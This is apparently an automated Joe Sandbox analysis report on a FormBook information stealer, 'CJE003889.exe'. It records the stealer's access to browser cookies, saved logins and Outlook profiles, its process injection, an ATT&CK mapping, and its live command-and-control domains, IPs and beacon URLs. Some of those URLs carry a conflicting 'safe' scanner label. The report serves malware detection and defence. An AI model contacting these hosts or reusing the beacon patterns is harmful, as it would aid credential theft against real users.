                Source: C:\Windows\SysWOW64\ROUTE.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXEFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXEFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXEKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: CJE003889.exeBinary or memory string: WIN_81
                Source: CJE003889.exeBinary or memory string: WIN_XP
                Source: CJE003889.exeBinary or memory string: WIN_XPe
                Source: CJE003889.exeBinary or memory string: WIN_VISTA
                Source: CJE003889.exeBinary or memory string: WIN_7
                Source: CJE003889.exeBinary or memory string: WIN_8
                Source: CJE003889.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.3491828564.0000000002DA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3491386703.00000000008B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2149646425.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3491887739.0000000002DF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2142478185.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2150676929.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3490916220.00000000028F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3491866393.0000000003530000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00CD6283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00CD6283
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00CD6747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00CD6747
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts
                1
                Native API
                1
                DLL Side-Loading
                1
                Exploitation for Privilege Escalation
                1
                Disable or Modify Tools
                1
                OS Credential Dumping
                2
                System Time Discovery
                Remote Services1
                Archive Collected Data
                4
                Ingress Tool Transfer
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts
                1
                Abuse Elevation Control Mechanism
                1
                Deobfuscate/Decode Files or Information
                21
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol1
                Data from Local System
                1
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading
                1
                Abuse Elevation Control Mechanism
                Security Account Manager2
                File and Directory Discovery
                SMB/Windows Admin Shares1
                Email Collection
                4
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts
                3
                Obfuscated Files or Information
                NTDS116
                System Information Discovery
                Distributed Component Object Model21
                Input Capture
                4
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation
                1
                DLL Side-Loading
                LSA Secrets151
                Security Software Discovery
                SSH3
                Clipboard Data
                Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection
                2
                Valid Accounts
                Cached Domain Credentials2
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Virtualization/Sandbox Evasion
                DCSync3
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation
                Proc Filesystem1
                Application Window Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection
                /etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1572869 Sample: CJE003889.exe Startdate: 11/12/2024 Architecture: WINDOWS Score: 100 28 www.313333.xyz 2->28 30 www.wuyyv4tq.top 2->30 32 7 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Multi AV Scanner detection for submitted file 2->44 46 Yara detected FormBook 2->46 50 3 other signatures 2->50 10 CJE003889.exe 2 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 28->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 68 Switches to a custom stack to bypass stack traces 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 mcPAaApkdo.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 ROUTE.EXE 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 mcPAaApkdo.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.313333.xyz 103.120.80.111, 49779, 49785, 49792 WEST263GO-HKWest263InternationalLimitedHK Hong Kong 22->34 36 www.balanpoint.life 209.74.79.40, 49975, 49981, 49987 MULTIBAND-NEWHOPEUS United States 22->36 38 6 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                CJE003889.exe26%ReversingLabsWin32.Trojan.AutoitInject
                CJE003889.exe26%VirustotalBrowse
                CJE003889.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://www.313333.xyz/5jna/0%Avira URL Cloudsafe
                http://www.epayassist.net/sk-logabpstatus.php?a=a1l6S1drb3FtcGMvdlFHNDVXelp6VFg3bWdKdW1EME1NODd3V1Zs0%Avira URL Cloudsafe
                https://www.west.cn/services/mail/0%Avira URL Cloudsafe
                http://www.erexolsk.shop/jh0k/?gnlxDxt=cE+iwc0yj830uuhklCcrX/wOzR3WnF1m5/XKwWZdu8qZVYJFuXJD1Zapdap+RxDw3ImSWqBjcd0u94ZA4St+7Z5LUmDNQvXJfTb2ufMRWduIOzpab4DfT5A=&Cpbp2=zjh46zEHi0%Avira URL Cloudsafe
                https://www.west.cn/services/domain/0%Avira URL Cloudsafe
                http://www.mzkd6gp5.top/0hqe/0%Avira URL Cloudsafe
                http://www.grimbo.boats/mjln/?gnlxDxt=mRd2QOrZow0Zy8rcEJSXGRznkeTfTdv0yZ2YG4FUDMPe/4koX4+1ymts9nnhEJy5dYKCFioRx0Zy3sftYsziig07/zAt0ecRqm4eM3zYCvLGPFaM+s8J2dY=&Cpbp2=zjh46zEHi0%Avira URL Cloudsafe
                http://domshow.vhostgo.com/template/img/paimai/jiaoyixq_jiaoyi.jpg)0%Avira URL Cloudsafe
                http://www.balanpoint.life/0cbv/0%Avira URL Cloudsafe
                https://www.west.cn/services/webhosting/0%Avira URL Cloudsafe
                http://www.epayassist.net/px.js?ch=10%Avira URL Cloudsafe
                https://www.erexolsk.shop/jh0k/?gnlxDxt=cE0%Avira URL Cloudsafe
                http://www.epayassist.net/px.js?ch=20%Avira URL Cloudsafe
                http://www.erexolsk.shop/jh0k/0%Avira URL Cloudsafe
                http://www.grimbo.boats/mjln/0%Avira URL Cloudsafe
                http://domshow.vhostgo.com/template/img/paimai/banner_jiaoyi.jpg)0%Avira URL Cloudsafe
                http://www.erexolsk.shop0%Avira URL Cloudsafe
                https://www.west.cn/ykj/view.asp?domain=313333.xyz0%Avira URL Cloudsafe
                http://www.313333.xyz/5jna/?gnlxDxt=o8GwGASYBJt/nb/piMB5DNiJPc8rJicYda1NcmeQznd2DA1k1E5AtP7RU4WuyFuLPAN95z5B1yv6cgM9wMfZloOraKLvaksg7S1pHUhIybvdcNjqXcBCCD0=&Cpbp2=zjh46zEHi0%Avira URL Cloudsafe
                https://www.west.cn/jiaoyi/0%Avira URL Cloudsafe
                http://www.wuyyv4tq.top/0qmw/?gnlxDxt=278+fPNRLmRxSvCH34hbLODYmABWu8vkjuqqbvjl/R4r9MC/xh0rLSqKPcdQtIyz70t8P1XMFdXw2YmeVp9Igz5U6icI9PUQLWv4eV+o4CclGEV4ym29rSk=&Cpbp2=zjh46zEHi0%Avira URL Cloudsafe
                http://www.balanpoint.life/0cbv/?Cpbp2=zjh46zEHi&gnlxDxt=1lixiFn2nPh88HonPghJDFAFcnnzyrdvNvLcEc2wPpGyfhd+75GCEpQKEfA1MXagijVYaOCU2MEqrz5pMxxhEIji4Qs6Ro2dwyRTrjDFXU7ZlJam3DSGN9g=0%Avira URL Cloudsafe
                https://www.west.cn/cloudhost/0%Avira URL Cloudsafe
                http://www.mzkd6gp5.top/0hqe/?gnlxDxt=DKA1iVPcoZUjyp2kMNYgPydN8TVlv2BCRXxU2Kub3rtTiJbt+pfDiXzRopvp7VMLzDHcJo8PeW6VBgWmqyKjijxSdggTsAG5c4hPlmGpc/Wen6gVL7B2F3s=&Cpbp2=zjh46zEHi0%Avira URL Cloudsafe
                http://www.epayassist.net/sjh2/0%Avira URL Cloudsafe
                http://www.epayassist.net/sjh2/?gnlxDxt=YkJjGs4lbp5ts7eeq38ve60glEoSeBv7n+jiAmf9K/aJhMvSfAmkEslPX5dpK+rGqB8Vqcj9eGPLpji1qr6bjKpF389iooxy/bfE0yZvpr3FHFNGtOhSTJw=&Cpbp2=zjh46zEHi0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                dns.ladipage.com
                13.228.81.39
                truefalse
                  high
                  www.epayassist.net
                  208.91.197.27
                  truetrue
                    unknown
                    www.mzkd6gp5.top
                    172.67.158.81
                    truetrue
                      unknown
                      www.grimbo.boats
                      172.67.182.198
                      truetrue
                        unknown
                        www.balanpoint.life
                        209.74.79.40
                        truetrue
                          unknown
                          www.mosquitoxp.lol
                          38.180.232.109
                          truetrue
                            unknown
                            www.313333.xyz
                            103.120.80.111
                            truetrue
                              unknown
                              www.wuyyv4tq.top
                              156.226.63.13
                              truetrue
                                unknown
                                www.erexolsk.shop
                                unknown
                                unknownfalse
                                  unknown
                                  NameMaliciousAntivirus DetectionReputation
                                  http://www.grimbo.boats/mjln/?gnlxDxt=mRd2QOrZow0Zy8rcEJSXGRznkeTfTdv0yZ2YG4FUDMPe/4koX4+1ymts9nnhEJy5dYKCFioRx0Zy3sftYsziig07/zAt0ecRqm4eM3zYCvLGPFaM+s8J2dY=&Cpbp2=zjh46zEHitrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.balanpoint.life/0cbv/true
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.313333.xyz/5jna/true
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.erexolsk.shop/jh0k/?gnlxDxt=cE+iwc0yj830uuhklCcrX/wOzR3WnF1m5/XKwWZdu8qZVYJFuXJD1Zapdap+RxDw3ImSWqBjcd0u94ZA4St+7Z5LUmDNQvXJfTb2ufMRWduIOzpab4DfT5A=&Cpbp2=zjh46zEHitrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.mzkd6gp5.top/0hqe/true
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.grimbo.boats/mjln/true
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.313333.xyz/5jna/?gnlxDxt=o8GwGASYBJt/nb/piMB5DNiJPc8rJicYda1NcmeQznd2DA1k1E5AtP7RU4WuyFuLPAN95z5B1yv6cgM9wMfZloOraKLvaksg7S1pHUhIybvdcNjqXcBCCD0=&Cpbp2=zjh46zEHitrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.erexolsk.shop/jh0k/true
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.wuyyv4tq.top/0qmw/?gnlxDxt=278+fPNRLmRxSvCH34hbLODYmABWu8vkjuqqbvjl/R4r9MC/xh0rLSqKPcdQtIyz70t8P1XMFdXw2YmeVp9Igz5U6icI9PUQLWv4eV+o4CclGEV4ym29rSk=&Cpbp2=zjh46zEHitrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.balanpoint.life/0cbv/?Cpbp2=zjh46zEHi&gnlxDxt=1lixiFn2nPh88HonPghJDFAFcnnzyrdvNvLcEc2wPpGyfhd+75GCEpQKEfA1MXagijVYaOCU2MEqrz5pMxxhEIji4Qs6Ro2dwyRTrjDFXU7ZlJam3DSGN9g=true
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.mzkd6gp5.top/0hqe/?gnlxDxt=DKA1iVPcoZUjyp2kMNYgPydN8TVlv2BCRXxU2Kub3rtTiJbt+pfDiXzRopvp7VMLzDHcJo8PeW6VBgWmqyKjijxSdggTsAG5c4hPlmGpc/Wen6gVL7B2F3s=&Cpbp2=zjh46zEHitrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.epayassist.net/sjh2/true
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.epayassist.net/sjh2/?gnlxDxt=YkJjGs4lbp5ts7eeq38ve60glEoSeBv7n+jiAmf9K/aJhMvSfAmkEslPX5dpK+rGqB8Vqcj9eGPLpji1qr6bjKpF389iooxy/bfE0yZvpr3FHFNGtOhSTJw=&Cpbp2=zjh46zEHitrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://duckduckgo.com/chrome_newtabROUTE.EXE, 00000006.00000003.2331961284.0000000002B4C000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://dts.gnpge.commcPAaApkdo.exe, 00000007.00000002.3492217014.00000000031EC000.00000004.00000001.00040000.00000000.sdmpfalse
                                      high
                                      https://duckduckgo.com/ac/?q=ROUTE.EXE, 00000006.00000003.2331961284.0000000002B4C000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icoROUTE.EXE, 00000006.00000003.2331961284.0000000002B4C000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://www.west.cn/services/webhosting/ROUTE.EXE, 00000006.00000002.3492415210.0000000003BB6000.00000004.10000000.00040000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3493766399.0000000006090000.00000004.00000800.00020000.00000000.sdmp, mcPAaApkdo.exe, 00000007.00000002.3492217014.0000000002D36000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.epayassist.net/sk-logabpstatus.php?a=a1l6S1drb3FtcGMvdlFHNDVXelp6VFg3bWdKdW1EME1NODd3V1ZsROUTE.EXE, 00000006.00000002.3492415210.000000000406C000.00000004.10000000.00040000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3493766399.0000000006090000.00000004.00000800.00020000.00000000.sdmp, mcPAaApkdo.exe, 00000007.00000002.3492217014.00000000031EC000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://www.west.cn/services/domain/ROUTE.EXE, 00000006.00000002.3492415210.0000000003BB6000.00000004.10000000.00040000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3493766399.0000000006090000.00000004.00000800.00020000.00000000.sdmp, mcPAaApkdo.exe, 00000007.00000002.3492217014.0000000002D36000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://www.west.cn/services/mail/ROUTE.EXE, 00000006.00000002.3492415210.0000000003BB6000.00000004.10000000.00040000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3493766399.0000000006090000.00000004.00000800.00020000.00000000.sdmp, mcPAaApkdo.exe, 00000007.00000002.3492217014.0000000002D36000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=ROUTE.EXE, 00000006.00000003.2331961284.0000000002B4C000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=ROUTE.EXE, 00000006.00000003.2331961284.0000000002B4C000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              http://domshow.vhostgo.com/template/img/paimai/jiaoyixq_jiaoyi.jpg)ROUTE.EXE, 00000006.00000002.3492415210.0000000003BB6000.00000004.10000000.00040000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3493766399.0000000006090000.00000004.00000800.00020000.00000000.sdmp, mcPAaApkdo.exe, 00000007.00000002.3492217014.0000000002D36000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.epayassist.net/px.js?ch=1ROUTE.EXE, 00000006.00000002.3492415210.000000000406C000.00000004.10000000.00040000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3493766399.0000000006090000.00000004.00000800.00020000.00000000.sdmp, mcPAaApkdo.exe, 00000007.00000002.3492217014.00000000031EC000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.ecosia.org/newtab/ROUTE.EXE, 00000006.00000003.2331961284.0000000002B4C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                http://www.epayassist.net/px.js?ch=2ROUTE.EXE, 00000006.00000002.3492415210.000000000406C000.00000004.10000000.00040000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3493766399.0000000006090000.00000004.00000800.00020000.00000000.sdmp, mcPAaApkdo.exe, 00000007.00000002.3492217014.00000000031EC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://www.erexolsk.shop/jh0k/?gnlxDxt=cEROUTE.EXE, 00000006.00000002.3492415210.0000000004522000.00000004.10000000.00040000.00000000.sdmp, mcPAaApkdo.exe, 00000007.00000002.3492217014.00000000036A2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.erexolsk.shopmcPAaApkdo.exe, 00000007.00000002.3491386703.0000000000904000.00000040.80000000.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://ac.ecosia.org/autocomplete?q=ROUTE.EXE, 00000006.00000003.2331961284.0000000002B4C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://www.west.cn/ykj/view.asp?domain=313333.xyzROUTE.EXE, 00000006.00000002.3492415210.0000000003BB6000.00000004.10000000.00040000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3493766399.0000000006090000.00000004.00000800.00020000.00000000.sdmp, mcPAaApkdo.exe, 00000007.00000002.3492217014.0000000002D36000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://domshow.vhostgo.com/template/img/paimai/banner_jiaoyi.jpg)ROUTE.EXE, 00000006.00000002.3492415210.0000000003BB6000.00000004.10000000.00040000.00000000.sdmp, mcPAaApkdo.exe, 00000007.00000002.3492217014.0000000002D36000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://www.west.cn/jiaoyi/ROUTE.EXE, 00000006.00000002.3492415210.0000000003BB6000.00000004.10000000.00040000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3493766399.0000000006090000.00000004.00000800.00020000.00000000.sdmp, mcPAaApkdo.exe, 00000007.00000002.3492217014.0000000002D36000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchROUTE.EXE, 00000006.00000003.2331961284.0000000002B4C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://hm.baidu.com/hm.js?352bf0fb165ca7ab634d3cea879c7a72ROUTE.EXE, 00000006.00000002.3492415210.0000000003BB6000.00000004.10000000.00040000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3493766399.0000000006090000.00000004.00000800.00020000.00000000.sdmp, mcPAaApkdo.exe, 00000007.00000002.3492217014.0000000002D36000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      high
                                                      https://www.west.cn/cloudhost/ROUTE.EXE, 00000006.00000002.3492415210.0000000003BB6000.00000004.10000000.00040000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3493766399.0000000006090000.00000004.00000800.00020000.00000000.sdmp, mcPAaApkdo.exe, 00000007.00000002.3492217014.0000000002D36000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=ROUTE.EXE, 00000006.00000003.2331961284.0000000002B4C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs
                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        172.67.182.198
                                                        www.grimbo.boatsUnited States
                                                        13335CLOUDFLARENETUStrue
                                                        172.67.158.81
                                                        www.mzkd6gp5.topUnited States
                                                        13335CLOUDFLARENETUStrue
                                                        38.180.232.109
                                                        www.mosquitoxp.lolUnited States
                                                        174COGENT-174UStrue
                                                        209.74.79.40
                                                        www.balanpoint.lifeUnited States
                                                        31744MULTIBAND-NEWHOPEUStrue
                                                        103.120.80.111
                                                        www.313333.xyzHong Kong
                                                        139021WEST263GO-HKWest263InternationalLimitedHKtrue
                                                        208.91.197.27
                                                        www.epayassist.netVirgin Islands (BRITISH)
                                                        40034CONFLUENCE-NETWORK-INCVGtrue
                                                        13.228.81.39
                                                        dns.ladipage.comUnited States
                                                        16509AMAZON-02USfalse
                                                        156.226.63.13
                                                        www.wuyyv4tq.topSeychelles
                                                        133201COMING-ASABCDEGROUPCOMPANYLIMITEDHKtrue
                                                        Joe Sandbox version:41.0.0 Charoite
                                                        Analysis ID:1572869
                                                        Start date and time:2024-12-11 04:48:48 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 8m 44s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Run name:Run with higher sleep bypass
                                                        Number of analysed new started processes analysed:8
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:2
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:CJE003889.exe
                                                        Detection:MAL
                                                        Classification:mal100.troj.spyw.evad.winEXE@7/3@9/8
                                                        EGA Information:
                                                        • Successful, ratio: 75%
                                                        HCA Information:
                                                        • Successful, ratio: 92%
                                                        • Number of executed functions: 51
                                                        • Number of non-executed functions: 272
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .exe
                                                        • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                        • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                        • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.63
                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                        No simulations
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        103.120.80.111Payment&WarantyBonds.exeGet hashmaliciousFormBookBrowse
                                                        • www.cotti.club/3ej6/
                                                        Payment&WarantyBonds.exeGet hashmaliciousFormBookBrowse
                                                        • www.cotti.club/3ej6/
                                                        pismo1A 12.06.2024.exeGet hashmaliciousFormBookBrowse
                                                        • www.zhuan-tou.com/lx5p/
                                                        CFV20240600121.exeGet hashmaliciousFormBookBrowse
                                                        • www.zhuan-tou.com/lx5p/
                                                        BMhDm7YW62.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                        • www.633922.com/m858/?yRV=coEloaOWB4ccjb+v6cLGO3+aXUsmpIWjCRRWxfkEZg7Qbr+sYY/0Gc0G57svkQNplbCaP8Xe0B9P1hE+GhuMVBij7PKQzh7NHQ==&GJ=C4IdWhJXSFOXR8D
                                                        Payment_Copy_[SWIFT_COPY].exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                        • www.633922.com/m858/
                                                        Invoice_&_SOA_ready_for_dispatch.exeGet hashmaliciousFormBookBrowse
                                                        • www.633922.com/udwf/?G0Yxd2Q=EgoyY5F9PuSC7IWgflDFG7vO7ChOxNSXUZQtmoKTqYmDoJiW0KocQ9ej5sZbxdFlzd/pkXvUfPTapOCXwmOa8U5eEphhhK4tvg==&pp=dZa4
                                                        Request_List.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                        • www.633922.com/oiwu/?Jz0HU=+L/6O+Q8u+ajcbZGgAmmZd+NMVb04NFrpK29B3gBvKtIEVSU5Z3YQVU7jFSO9jVfLdoVnndqUGYQzkOx6q7e3NvCIXwJmOpdTA==&M4=XF_T
                                                        881SP1exr1.exeGet hashmaliciousFormBookBrowse
                                                        • www.lpqxmz.site/4hc5/?ntxh9=V48LzvX0&P6=245SFh9gPs7u7SMvCZq1WQwUtHwLu6OXJLdJjwoxg6CFn9y4LEhCSrC/ms6Ftk+AVu/2
                                                        TT_PAYMENT_SLIP_23AUG2023.docGet hashmaliciousFormBookBrowse
                                                        • www.lpqxmz.site/4hc5/?wL3dPBV0=245SFh9gT8/q7yEoAZq1WQwUtHwLu6OXJLFZ/z0wkaCEnMe+MUwOEv69lJW52EKzavqGKA==&Cxl0M=YN64Xx
                                                        208.91.197.27Pp7OXMFwqhXKx5Y.exeGet hashmaliciousFormBookBrowse
                                                        • www.epicurecooks.world/mdkc/
                                                        New Order.exeGet hashmaliciousFormBookBrowse
                                                        • www.614genetics.online/n3sn/
                                                        72STaC6BmljfbIQ.exeGet hashmaliciousFormBookBrowse
                                                        • www.mohawktooldie.online/e1ut/
                                                        quotation.exeGet hashmaliciousFormBookBrowse
                                                        • www.cortisalincontrol.net/cbfz/
                                                        PO_1111101161.vbsGet hashmaliciousFormBookBrowse
                                                        • www.guacamask.online/rfhq/
                                                        specifications.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • www.cortisalincontrol.net/cbfz/
